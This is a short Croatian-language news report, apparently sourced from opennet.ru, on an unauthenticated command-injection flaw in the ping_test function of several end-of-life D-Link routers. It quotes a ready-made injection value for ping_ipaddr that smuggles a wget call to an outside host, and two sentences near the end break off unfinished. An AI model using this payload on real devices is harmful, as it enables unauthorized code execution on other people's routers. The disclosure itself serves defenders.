U D-Link bežičnim usmjerivačima
Zanimljivo, prema programerima firmvera, poziv "ping_test" trebao bi se izvršiti tek nakon provjere autentičnosti, ali u stvarnosti se poziva u svakom slučaju, bez obzira na prijavu na web sučelje. Konkretno, prilikom pristupanja skripti apply_sec.cgi i prosljeđivanju parametra “action=ping_test”, skripta preusmjerava na stranicu za provjeru autentičnosti, ali u isto vrijeme izvodi radnju povezanu s ping_testom. Za izvršenje koda korištena je još jedna ranjivost u samom ping_testu, koja poziva uslužni program ping bez propisne provjere ispravnosti IP adrese poslane na testiranje. Na primjer, da biste pozvali uslužni program wget i prenijeli rezultate naredbe “echo 1234” na vanjski host, samo navedite parametar “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Prisutnost ranjivosti službeno je potvrđena u sljedećim modelima:
- DIR-655 s firmwareom 3.02b05 ili starijim;
- DIR-866L s firmwareom 1.03b04 ili starijim;
- DIR-1565 s firmwareom 1.01 ili starijim;
- DIR-652 (nisu navedene informacije o problematičnim verzijama firmvera)
Razdoblje podrške za ove modele je već isteklo, pa D-Link
Kasnije je otkriveno da je i ranjivost
Izvor: opennet.ru